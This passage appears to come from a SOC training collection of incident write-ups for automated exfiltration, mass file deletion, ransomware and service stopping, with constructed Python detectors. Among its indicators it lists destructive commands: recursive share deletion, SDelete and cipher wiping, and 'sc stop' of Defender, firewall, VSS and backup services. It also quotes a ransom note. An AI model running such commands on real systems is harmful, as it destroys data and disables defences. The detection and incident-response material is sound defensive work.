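    {"ts": "2024-03-03 08:12:00", "src": "192.168.45.20", "dst": "cdn.example.net:443", "bytes_out": int(1.2 * MB)},
    {"ts": "2024-03-03 09:47:00", "src": "192.168.45.20", "dst": "cdn.example.net:443", "bytes_out": 5 * MB},
    {"ts": "2024-03-03 13:05:00", "src": "192.168.45.20", "dst": "cdn.example.net:443", "bytes_out": 2 * MB},
    {"ts": "2024-03-03 17:30:00", "src": "192.168.45.20", "dst": "cdn.example.net:443", "bytes_out": 9 * MB},
]

if __name__ == "__main__":
    for finding in detect_periodic_transfers(SAMPLE_FLOWS):
        print(finding)
```

The daily series is reported with a 1440-minute period and the off-hours flag set; the 30-minute series is reported with a 30-minute period during business hours, which is why a volume-only rule would have missed it for four days while a regularity rule would not. The off-hours flag is kept as enrichment rather than a gate, since report 121's transfers ran at 09:00.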
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Varonis alert | Varonis Console | Confirmed automated exfiltration script |
| 2. Process Investigation | Identify scheduled task | CrowdStrike Falcon | “FinanceBackup” task running PowerShell script |
| 3. User Interview | Contact kwilson | Teams, Phone | User did NOT create script (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | FIN-WS-112 quarantined |
| 5. C2 Blocking | Block destination IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-161
Summary: T1020 – Automated Exfiltration of 45 MB Every 30 Minutes
Status: RESOLVED
Resolution: MALICIOUS – Automated Exfiltration Stopped
Priority: P1 – CRITICAL
Labels: T1020, automated-exfiltration, powershell, varonis, compromised-account
Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Automated Data Collection Script Detected – Potential Mass Exfiltration”.
User: kwilson@company.com (Finance Manager).
Host: FIN-WS-112.
Script: backup.ps1 running every 30 minutes.
Data: 45 MB exfiltrated in first run.
Time: 2024-03-03 09:30 EST.
Technique: MITRE ATT&CK T1020 – Automated Exfiltration.
2. Technical Analysis:
Attack Chain:
08:30 – kwilson account compromised via phishing
08:45 – Attacker logs into FIN-WS-112 via RDP
08:50 – Attacker creates backup.ps1 script
09:00 – Attacker creates scheduled task “FinanceBackup”
09:01 – First automated run (45 MB exfiltrated)
09:30 – Second run begins; Varonis detects
Script Analysis:
Collection: Files from finance shares, executive shares, local folders
Frequency: Every 30 minutes (ensures new files are captured)
Exfiltration: HTTP POST to 185.143.221[.]89
Persistence: Scheduled task runs as user
Data Exfiltrated (First Run – 45 MB):
Finance reports (23 files) – 18 MB
Budget spreadsheets (12 files) – 15 MB
Executive board documents (5 files) – 8 MB
Personal finance documents (user’s) – 4 MB
Attacker Intent:
Establish persistent, automated exfiltration
Continuously steal new data as it’s created
Evade detection by using small, frequent transfers
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50-09:00 – Script and task created
09:01 – First exfiltration (45 MB)
09:30 – Second run starts
09:30 – Varonis alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – Script and task removed
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\backup.ps1 (SHA256: a1b2c3d4…)
Scheduled Task:
– “FinanceBackup” (every 30 minutes)
Network:
– Destination: 185.143.221[.]89:80
– Pattern: POST /upload every 30 minutes
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Disabled scheduled task.
Deleted backup.ps1.
Blocked destination IP at firewall.
Disabled kwilson account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (45 MB in first run).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to automated exfiltration setup.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Script execution allowed (no application control).
6. Business Impact:
Operational Impact: Finance host offline; user offline.
Data Exposure: 45 MB of financial and executive data exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Automated exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control.
Enhanced Varonis monitoring for automated collection patterns.
8. Conclusion:
An attacker compromised a finance manager’s account and set up an automated exfiltration script that ran every 30 minutes, stealing 45 MB of data in its first run. Varonis detected the automated pattern and enabled rapid containment before the second run could complete.
Closure Rationale: Automated exfiltration stopped; data exfiltrated (45 MB); account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-03 10:30 EST
122. T1485 – Data Destruction (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-DATA-DESTROY-1485-7842
Alert Time: 2024-03-03 14:15:33 EST
Severity: CRITICAL (98/100)
Source: Sysmon (Event ID 11 – FileCreate, Event ID 23 – FileDelete)
Rule: “Mass File Deletion Detected – Potential Data Destruction”
MITRE ATT&CK: T1485 – Data Destruction
Alert Details:
Detection: Mass file deletion from critical file server
Host: FILESRV-01 (Primary File Server)
User: SYSTEM (via compromised admin account)
Time: 14:00-14:15 EST
File Delete Events (Event ID 23):
14:00-14:15: 12,847 files deleted
Total size: 78 GB
Locations targeted:
\\filesrv\finance\*.* – 3,456 files (23 GB)
\\filesrv\hr\*.* – 2,891 files (15 GB)
\\filesrv\r&d\*.* – 4,234 files (28 GB)
\\filesrv\executive\*.* – 1,234 files (8 GB)
\\filesrv\backups\*.* – 1,032 files (4 GB)
Process Details:
Process: cmd.exe (PID: 4789)
Parent: psexec.exe (from attacker workstation)
Command: del /s /q \\filesrv\finance\*.*
Command: del /s /q \\filesrv\hr\*.*
Command: del /s /q \\filesrv\r&d\*.*
Command: del /s /q \\filesrv\executive\*.*
Command: del /s /q \\filesrv\backups\*.*
Additional Tools:
SDelete.exe (used for secure deletion on some files)
Cipher.exe /w (used to wipe free space)
Detection Logic:
12,847 files deleted in 15 minutes (mass destruction)
Critical business data targeted (finance, HR, R&D, executive)
Backups also deleted (preventing recovery)
Secure deletion tools used (SDelete, cipher)
Pattern matches ransomware preparation or malicious destruction
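The detection logic above (a burst of Event ID 23 deletions from one process, backup locations among the targets, wiping tools launched alongside) as a check over Sysmon events. This is an added example, not the page's rule and not a Sysmon configuration; the field names follow Sysmon Event ID 1 (ProcessCreate) and Event ID 23 (FileDelete), but every event is constructed, and the 500-deletes-in-5-minutes threshold, the protected backup prefix and the wiping-tool names are assumptions. The constructed parent process is PSEXESVC.exe, the service PsExec installs on the remote host, which is what Sysmon on the file server itself would record.

```python
"""Mass-file-deletion detection over constructed Sysmon events.

Added example: not the page's rule and not a Sysmon configuration. Field
names follow Sysmon Event ID 1 and Event ID 23, but every record here is
constructed; thresholds, the protected path and tool names are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime

DELETE_THRESHOLD = 500                           # assumed: deletes by one process inside the window
WINDOW_SECONDS = 300                             # assumed sliding window
PROTECTED_PREFIXES = ("\\\\filesrv\\backups\\",)   # assumed on-server backup share (lowercase)
WIPE_TOOLS = {"sdelete.exe", "sdelete64.exe", "cipher.exe"}


def parse_utc(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_mass_deletion(events, threshold=DELETE_THRESHOLD, window=WINDOW_SECONDS):
    """Return {ProcessId: finding} for processes that delete `threshold` or more
    files within `window` seconds. Findings carry the command line and parent
    from Event ID 1, whether backup paths were hit, and which wiping tools
    were started on the host during the stream."""
    procs, recent, totals = {}, defaultdict(deque), defaultdict(int)
    backups_hit, wipe_tools, findings = defaultdict(int), set(), {}
    for e in sorted(events, key=lambda x: x["UtcTime"]):
        if e["EventID"] == 1:
            procs[e["ProcessId"]] = e
            if basename(e["Image"]) in WIPE_TOOLS:
                wipe_tools.add(basename(e["Image"]))
        elif e["EventID"] == 23:
            pid, t = e["ProcessId"], parse_utc(e["UtcTime"])
            q = recent[pid]
            q.append(t)
            while (t - q[0]).total_seconds() > window:   # drop deletes older than the window
                q.popleft()
            totals[pid] += 1
            if e["TargetFilename"].lower().startswith(PROTECTED_PREFIXES):
                backups_hit[pid] += 1
            if len(q) >= threshold and pid not in findings:
                p = procs.get(pid, {})
                findings[pid] = {
                    "image": p.get("Image", e["Image"]),
                    "parent_image": p.get("ParentImage", "unknown"),
                    "command_line": p.get("CommandLine", "unknown"),
                    "user": e["User"],
                    "first_trigger": e["UtcTime"],
                    "deletes_in_window": len(q),
                }
    for pid, f in findings.items():           # enrich once the whole stream is seen
        f["total_deletes"] = totals[pid]
        f["backups_targeted"] = backups_hit[pid] > 0
        f["wipe_tools_seen"] = sorted(wipe_tools)
    return findings


def sample_events():
    """Constructed stream: cmd.exe under the PsExec service deleting 1,200 files
    across five shares in ten minutes (14:00 EST = 19:00 UTC), a wiping tool
    started from that shell, and explorer.exe deleting a few files normally."""
    shares = ["\\\\filesrv\\finance\\", "\\\\filesrv\\hr\\", "\\\\filesrv\\r&d\\",
              "\\\\filesrv\\executive\\", "\\\\filesrv\\backups\\"]
    ev = [{"EventID": 1, "UtcTime": "2024-03-03 18:59:58.000000", "ProcessId": 4789,
           "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\PSEXESVC.exe",
           "CommandLine": "cmd.exe /c del /s /q \\\\filesrv\\finance\\*.*", "User": "NT AUTHORITY\\SYSTEM"},
          {"EventID": 1, "UtcTime": "2024-03-03 19:10:00.000000", "ProcessId": 5120,
           "Image": "C:\\Tools\\sdelete.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
           "CommandLine": "sdelete.exe -s \\\\filesrv\\finance", "User": "NT AUTHORITY\\SYSTEM"}]
    for i in range(1200):                                  # two deletes per second
        secs = i // 2
        ev.append({"EventID": 23, "ProcessId": 4789, "Image": "C:\\Windows\\System32\\cmd.exe",
                   "UtcTime": f"2024-03-03 19:{secs // 60:02d}:{secs % 60:02d}.{(i % 2) * 500000:06d}",
                   "User": "NT AUTHORITY\\SYSTEM", "TargetFilename": f"{shares[i % 5]}file{i}.dat"})
    for i in range(20):                                    # benign: a user emptying a folder
        ev.append({"EventID": 23, "ProcessId": 2210, "Image": "C:\\Windows\\explorer.exe",
                   "UtcTime": f"2024-03-03 19:05:{i:02d}.000000", "User": "COMPANY\\asmith",
                   "TargetFilename": f"C:\\Users\\asmith\\Downloads\\old{i}.tmp"})
    return ev


if __name__ == "__main__":
    for pid, finding in detect_mass_deletion(sample_events()).items():
        print(pid, finding)
```

The finding fires on the 500th deletion (about four minutes in), well before the 1,200 deletes are done, which is the point of counting in a sliding window rather than on a daily report; the post-stream enrichment then shows the backup share was among the targets and that a wiping tool ran, the two facts that turn "mass deletion" into "destruction with recovery denial".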
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed mass file deletion |
| 2. Process Investigation | Identify source of deletion | CrowdStrike Falcon | psexec.exe from compromised admin workstation |
| 3. Immediate Action | Isolate file server | CrowdStrike, Network ACLs | FILESRV-01 quarantined |
| 4. Backup Restoration | Restore from backups | Veeam Backup | All 78 GB of data restored |
| 5. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 6. Incident Response | Activate disaster recovery | Management, Legal | Data destruction incident declared |
Jira Incident Report
Ticket: SOC-2024-162
Summary: T1485 – Mass Data Destruction of 78 GB on File Server
Status: RESOLVED
Resolution: MALICIOUS – Data Destroyed, Restored from Backups
Priority: P1 – CRITICAL
Labels: T1485, data-destruction, mass-deletion, sysmon, compromised-admin
Components: Data-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 23 (FileDelete).
Alert: “Mass File Deletion Detected – Potential Data Destruction”.
Host: FILESRV-01 (Primary File Server).
Action: 12,847 files (78 GB) deleted.
Time: 2024-03-03 14:15 EST.
Technique: MITRE ATT&CK T1485 – Data Destruction.
2. Technical Analysis:
Attack Chain:
13:30 – Domain admin account (jsmith) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
13:50 – Attacker uses psexec to access file server
14:00-14:15 – Mass file deletion using del commands
14:10 – Attacker runs SDelete on key directories
14:15 – Sysmon detects
Data Destroyed:
Finance: 3,456 files (23 GB) – financial records, reports
HR: 2,891 files (15 GB) – employee records, payroll
R&D: 4,234 files (28 GB) – source code, designs, IP
Executive: 1,234 files (8 GB) – board minutes, strategy
Backups: 1,032 files (4 GB) – on-server backups
Total: 12,847 files, 78 GB
Destruction Tools:
del /s /q: Recursive quiet deletion
SDelete.exe: Secure file deletion (overwrites data)
cipher.exe /w: Wipes free space (prevents recovery)
Attacker Intent:
Maximum business disruption
Prevent data recovery (secure deletion)
Possibly precursor to ransomware (no ransom note found)
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
13:50 – Access to file server
14:00-14:15 – Data destruction
14:15 – Sysmon alert
14:17 – SOC investigates
14:18 – File server isolated
14:20 – Backup restoration begins
Indicators of Compromise (IoCs):
Commands:
– del /s /q \\filesrv\finance\*.*
– del /s /q \\filesrv\hr\*.*
– del /s /q \\filesrv\r&d\*.*
– del /s /q \\filesrv\executive\*.*
– del /s /q \\filesrv\backups\*.*
– SDelete.exe execution
– cipher.exe /w execution
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Isolated FILESRV-01 via network ACLs.
Disabled jsmith account.
Reset admin password.
Blocked attacker IP at firewall.
Data Recovery:
Restored all 78 GB of data from Veeam backups (off-site).
Verified data integrity (no corruption).
File server back online at 15:30.
Account Remediation:
Reset all domain admin passwords.
Enforced MFA for all admins.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to file server (legitimate).
No file integrity monitoring on server.
6. Business Impact:
Operational Impact: File server offline for 1.5 hours.
Data Exposure: Data destroyed, not stolen (no exfiltration).
Business Disruption: All departments unable to access files for 1.5 hours.
Recovery Cost: Significant (restoration time, incident response).
7. Remediation & Prevention:
Completed Actions:
Data restored from backups.
Account secured.
File server back online.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved admin access behind VPN only.
Implemented file integrity monitoring on critical servers.
Enhanced backup frequency (hourly for critical data).
8. Conclusion:
An attacker compromised a domain admin account and systematically destroyed 78 GB of critical business data on the primary file server, including finance, HR, R&D, and executive files. Sysmon detected the mass deletion, and backups enabled full recovery within 1.5 hours.
Closure Rationale: Data destroyed; data restored from backups; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-03 15:30 EST
123. T1486 – Data Encrypted for Impact (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RANSOMWARE-1486-7842
Alert Time: 2024-03-03 11:30:22 EST
Severity: CRITICAL (99/100)
Source: CrowdStrike Falcon EDR
Rule: “Ransomware Behavior Detected – Mass File Encryption”
MITRE ATT&CK: T1486 – Data Encrypted for Impact
Alert Details:
Detection: Process encrypting multiple files and appending .locked extension
Host: ENG-WS-045 (Engineering Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 11:15-11:30 EST
Process Details:
Process: C:\Windows\Temp\encrypt.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: cmd.exe
File Encryption Events:
11:15-11:30: 2,847 files encrypted
File extensions changed to .locked
Locations affected:
C:\Users\rpatel\Documents\*.* – 1,234 files
C:\Users\rpatel\Desktop\*.* – 456 files
C:\Users\rpatel\Downloads\*.* – 234 files
D:\engineering_data\*.* – 923 files
Ransom Note:
File: README_LOCKED.txt (created in each folder)
Content:
YOUR FILES ARE ENCRYPTED!
All your documents, photos, databases and other important files have been encrypted with RSA-2048.
To recover your files, send 0.5 BTC to: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Then contact: decrypt@onionmail.org with your personal ID: ENG-7842-045
Detection Logic:
Mass file encryption (2,847 files in 15 minutes)
File extension changes (.locked)
Ransom note dropped
Process from Temp folder
Pattern matches ransomware attack
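The detection logic above (a burst of file writes dominated by one new extension, a ransom note dropped in each folder, the process running from a Temp directory) as a check over Sysmon Event ID 11 (FileCreate) events. This is an added example, not CrowdStrike's detection and not the page's own code; the field names follow Sysmon, but every event is constructed, and the 5-minute bucket, the 100-create threshold, the 90% dominant-extension share, the ransom-note filename pattern, the temp-directory list and the extension baseline are assumptions. It requires two of the three indicators to fire so that a bulk converter writing many same-extension files does not trip it on its own.

```python
"""Ransomware (mass encryption) indicators over constructed Sysmon FileCreate events.

Added example: not CrowdStrike's detection and not the page's own code.
Field names follow Sysmon Event ID 11, but every record is constructed;
window, thresholds, note pattern, temp dirs and baseline are assumptions.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

BUCKET_SECONDS = 300                   # assumed: tumbling 5-minute evaluation window
CREATE_THRESHOLD = 100                 # assumed: creates per process per window
DOMINANT_SHARE = 0.90                  # assumed: share of creates carrying one extension
RANSOM_NOTE = re.compile(r"(readme|recover|restore|decrypt|how[_ -]?to).*\.(txt|html|hta)$", re.I)
TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")
COMMON_EXTS = {".tmp", ".docx", ".xlsx", ".pdf", ".txt", ".log", ".dll", ".exe"}   # assumed baseline


def extension(path):
    """Last extension of a Windows path, lowercased, or '' if none."""
    name = path.rsplit("\\", 1)[-1].lower()
    return "." + name.rsplit(".", 1)[-1] if "." in name else ""


def detect_ransomware(events, bucket=BUCKET_SECONDS, threshold=CREATE_THRESHOLD):
    """Evaluate FileCreate events per (process, time bucket). A process is flagged
    when at least two indicators fire: a burst of creates dominated by an
    extension outside the baseline, a dropped ransom note, or an image running
    from a temp directory. Returns {ProcessId: finding} for the first bucket hit."""
    buckets = defaultdict(list)
    for e in events:
        if e["EventID"] != 11:
            continue
        t = datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        buckets[(e["ProcessId"], int(t.timestamp()) // bucket)].append(e)

    findings = {}
    for (pid, _), evs in sorted(buckets.items(), key=lambda kv: kv[0][1]):
        if pid in findings:
            continue
        image = evs[0]["Image"]
        exts = Counter(extension(e["TargetFilename"]) for e in evs)
        top_ext, top_n = exts.most_common(1)[0]
        notes = [e["TargetFilename"] for e in evs
                 if RANSOM_NOTE.search(e["TargetFilename"].rsplit("\\", 1)[-1])]
        indicators = []
        if len(evs) >= threshold and top_n / len(evs) >= DOMINANT_SHARE and top_ext not in COMMON_EXTS:
            indicators.append(f"{top_n} of {len(evs)} creates use extension {top_ext}")
        if notes:
            indicators.append(f"ransom note dropped ({len(notes)} copies)")
        if any(d in image.lower() for d in TEMP_DIRS):
            indicators.append(f"image runs from temp directory: {image}")
        if len(indicators) >= 2:
            findings[pid] = {"image": image, "user": evs[0]["User"], "creates": len(evs),
                             "dominant_ext": top_ext, "ransom_notes": len(notes),
                             "indicators": indicators}
    return findings


def sample_events():
    """Constructed stream: encrypt.exe writing 300 '.locked' files across four
    directories plus a README_LOCKED.txt in each (11:15 EST = 16:15 UTC), and
    WINWORD.EXE saving documents and temp files as normal user activity."""
    dirs = ["C:\\Users\\rpatel\\Documents\\", "C:\\Users\\rpatel\\Desktop\\",
            "C:\\Users\\rpatel\\Downloads\\", "D:\\engineering_data\\"]
    ev = []
    for i in range(300):                                   # one encrypted file per second
        ev.append({"EventID": 11, "UtcTime": f"2024-03-03 16:{15 + i // 60:02d}:{i % 60:02d}.000000",
                   "ProcessId": 4789, "Image": "C:\\Windows\\Temp\\encrypt.exe",
                   "User": "COMPANY\\rpatel", "TargetFilename": f"{dirs[i % 4]}doc{i}.docx.locked"})
    for i, d in enumerate(dirs):                           # ransom note per folder
        ev.append({"EventID": 11, "UtcTime": f"2024-03-03 16:19:{30 + i:02d}.000000",
                   "ProcessId": 4789, "Image": "C:\\Windows\\Temp\\encrypt.exe",
                   "User": "COMPANY\\rpatel", "TargetFilename": f"{d}README_LOCKED.txt"})
    for i in range(12):                                    # benign Office activity
        name = f"~$report{i}.tmp" if i % 2 else f"report{i}.docx"
        ev.append({"EventID": 11, "UtcTime": f"2024-03-03 16:16:{i * 4:02d}.000000",
                   "ProcessId": 3100, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                   "User": "COMPANY\\asmith", "TargetFilename": f"C:\\Users\\asmith\\Documents\\{name}"})
    return ev


if __name__ == "__main__":
    for pid, finding in detect_ransomware(sample_events()).items():
        print(pid, finding)
```

On the constructed stream encrypt.exe trips all three indicators in its first five-minute bucket (300 of 304 creates carry .locked, four notes, Temp-folder image), while WINWORD.EXE trips none; in production the same structure is what an EDR's behavioural rule reduces to, and the extension baseline would come from the host's own history rather than a fixed set.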
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed ransomware encryption |
| 2. Immediate Action | Isolate host | CrowdStrike | ENG-WS-045 quarantined |
| 3. Network Block | Block C2 communication | Palo Alto | Blocked outbound connections from host |
| 4. Ransomware Analysis | Identify ransomware variant | CrowdStrike Sandbox | LockBit 3.0 ransomware |
| 5. Backup Restoration | Restore encrypted files | Veeam Backup | All 2,847 files restored |
| 6. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-163
Summary: T1486 – LockBit Ransomware Encrypts 2,847 Files on Engineering Workstation
Status: RESOLVED
Resolution: MALICIOUS – Files Encrypted, Restored from Backups
Priority: P1 – CRITICAL
Labels: T1486, ransomware, data-encrypted, lockbit, crowdstrike
Components: Endpoint-Security, Backup-Recovery
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Ransomware Behavior Detected – Mass File Encryption”.
Host: ENG-WS-045 (Engineering, user rpatel).
Files: 2,847 files encrypted with .locked extension.
Ransomware: LockBit 3.0.
Time: 2024-03-03 11:30 EST.
Technique: MITRE ATT&CK T1486 – Data Encrypted for Impact.
2. Technical Analysis:
Attack Chain:
10:30 – rpatel account compromised via phishing
10:45 – Attacker logs into ENG-WS-045 via RDP
10:50 – Attacker downloads encrypt.exe (LockBit ransomware)
11:00 – Attacker executes ransomware
11:15-11:30 – Encryption of 2,847 files
11:30 – CrowdStrike detects
Ransomware Analysis:
Variant: LockBit 3.0
Encryption: RSA-2048 + AES-256
Extension: .locked
Note: README_LOCKED.txt
Wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
Contact: decrypt@onionmail.org
Files Encrypted (2,847):
Engineering documents (1,234) – project files, specs
Desktop files (456) – various
Downloads (234) – various
D:\engineering_data (923) – source code, designs, IP
Network Activity:
Attempted C2 communication (blocked)
No lateral movement detected
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – Ransomware downloaded
11:00-11:30 – Encryption
11:30 – CrowdStrike alert
11:32 – SOC investigates
11:33 – Host isolated
11:35 – Backup restoration begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\encrypt.exe (SHA256: a1b2c3d4…)
– README_LOCKED.txt (multiple locations)
– *.locked files (2,847)
Network:
– C2 attempt (blocked)
– Bitcoin wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
– Email: decrypt@onionmail.org
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked outbound connections from host.
Terminated encrypt.exe process.
Disabled rpatel account.
Reset password.
Data Recovery:
Restored all 2,847 encrypted files from Veeam backups.
Verified file integrity.
Host reimaged before returning to service.
Enterprise-wide Actions:
Scanned for other ransomware indicators (none found).
Enhanced email filtering for phishing.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to ransomware execution.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
User had local admin rights (allowed ransomware to run).
6. Business Impact:
Operational Impact: Engineering host offline for 3 hours.
Data Exposure: 2,847 files encrypted but restored from backups.
Financial Impact: No ransom paid; recovery costs.
7. Remediation & Prevention:
Completed Actions:
Ransomware stopped.
Files restored.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Removed local admin rights from standard users.
Implemented application control.
Enhanced backup frequency.
8. Conclusion:
An attacker compromised an engineering account and deployed LockBit ransomware, encrypting 2,847 files on a local workstation. CrowdStrike detected the ransomware behavior within minutes, enabling isolation and restoration from backups. No ransom was paid.
Closure Rationale: Files encrypted; files restored from backups; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-03 12:30 EST
124. T1489 – Service Stop (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SERVICE-STOP-1489-7842
Alert Time: 2024-03-03 16:30:45 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security
Rule: “Critical Service Stopped – Potential Disruption”
MITRE ATT&CK: T1489 – Service Stop
Alert Details:
Correlated Events:
Windows Event ID 7036 (Service Status Change):
Time: 16:15-16:30 EST
Host: SQL-SRV-01 (Primary SQL Server)
Service: MSSQLSERVER (SQL Server)
Action: STOPPED
Reason: “The service terminated unexpectedly”
Event ID 7036 (Additional Services):
16:16: SQL Agent – STOPPED
16:17: Windows Defender – STOPPED
16:18: Windows Firewall – STOPPED
16:19: Volume Shadow Copy – STOPPED
16:20: Backup Service – STOPPED
Process Creation (Event ID 4688):
Time: 16:14 EST
Process: sc.exe
Command: sc stop MSSQLSERVER
Command: sc stop MSSQLSERVERAGENT
Command: sc stop WinDefend
Command: sc stop MpsSvc
Command: sc stop VSS
Command: sc stop backup_service
Network Connection:
Time: 16:22 EST
Process: powershell.exe
Connection to 185.143.221[.]89:443
Detection Logic:
Multiple critical services stopped in sequence
SQL Server (database) targeted
Security services disabled (Defender, Firewall)
Backup services disabled (VSS, backup_service)
Pattern matches attacker preparing for ransomware or data destruction
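The correlation above joins two event streams: 7036 service-state changes tell you what stopped, and 4688 process-creation records tell you who ran the `sc stop`. The following correlator is an added example, not the Splunk ES rule; the event records, the service category map (database, security, backup) and the 10-minute window are constructed or assumed, while the service names are the ones in the alert.

```python
"""Correlate Windows 7036 service-stop events with 4688 'sc stop' command lines.

Added example, not the Splunk ES correlation from the report. Event records are
constructed to resemble the SQL-SRV-01 sequence; the category map and thresholds
are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Critical services grouped by what losing them costs the defender (assumed categories)
CRITICAL_SERVICES = {
    "mssqlserver": "database", "mssqlserveragent": "database",
    "windefend": "security", "mpssvc": "security",
    "vss": "backup", "backup_service": "backup",
}
# 'sc stop X' or 'C:\...\sc.exe stop X'; the service name is captured
SC_STOP = re.compile(r"^\s*(?:\S*\\)?sc(?:\.exe)?\s+stop\s+(\S+)", re.IGNORECASE)


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def build_sample_events():
    """Constructed 4688 (process creation) and 7036 (service state) records."""
    events = []
    sequence = ["MSSQLSERVER", "MSSQLSERVERAGENT", "WinDefend", "MpsSvc", "VSS", "backup_service"]
    base = datetime(2024, 3, 3, 16, 14, 0)
    for i, svc in enumerate(sequence):
        t_cmd = base + timedelta(minutes=i, seconds=5)
        events.append({"time": t_cmd.strftime("%Y-%m-%d %H:%M:%S"), "host": "SQL-SRV-01",
                       "id": 4688, "user": "jsmith", "cmd": f"sc stop {svc}"})
        t_stop = t_cmd + timedelta(seconds=40)
        events.append({"time": t_stop.strftime("%Y-%m-%d %H:%M:%S"), "host": "SQL-SRV-01",
                       "id": 7036, "service": svc, "state": "stopped"})
    # Benign: a patch window stopping one non-critical service on another host
    events += [
        {"time": "2024-03-03 03:00:00", "host": "APP-SRV-02", "id": 4688,
         "user": "svc_patch", "cmd": "C:\\Windows\\System32\\sc.exe stop Spooler"},
        {"time": "2024-03-03 03:00:02", "host": "APP-SRV-02", "id": 7036,
         "service": "Spooler", "state": "stopped"},
    ]
    return events


def correlate_service_stops(events, window=timedelta(minutes=10), min_categories=2):
    """Alert per host when critical services from >= min_categories categories stop
    inside `window`, and attach the operator-issued 'sc stop' evidence if present."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["time"])
        stops = [e for e in evs
                 if e["id"] == 7036 and e["state"] == "stopped"
                 and e["service"].lower() in CRITICAL_SERVICES]
        commands = {}  # service name (lower) -> (time, user) of the sc stop that issued it
        for e in evs:
            if e["id"] == 4688:
                m = SC_STOP.match(e["cmd"])
                if m:
                    commands[m.group(1).lower()] = (e["time"], e["user"])
        for i, first in enumerate(stops):
            t0 = parse_ts(first["time"])
            in_window = [s for s in stops[i:] if parse_ts(s["time"]) - t0 <= window]
            categories = {CRITICAL_SERVICES[s["service"].lower()] for s in in_window}
            if len(categories) >= min_categories:
                services = [s["service"] for s in in_window]
                alerts.append({
                    "host": host,
                    "first_stop": first["time"],
                    "last_stop": in_window[-1]["time"],
                    "services": services,
                    "categories": sorted(categories),
                    "via_sc_stop": [s for s in services if s.lower() in commands],
                    "users": sorted({commands[s.lower()][1] for s in services if s.lower() in commands}),
                })
                break  # one alert per host; later stops belong to the same episode
    return alerts


if __name__ == "__main__":
    for alert in correlate_service_stops(build_sample_events()):
        print(alert)
```

Requiring two or more categories (database plus security plus backup here) is what separates this from a DBA restarting SQL Server during maintenance; the `users` field gives the analyst the account to call, which is step 3 of the investigation table below.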
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed critical services stopped |
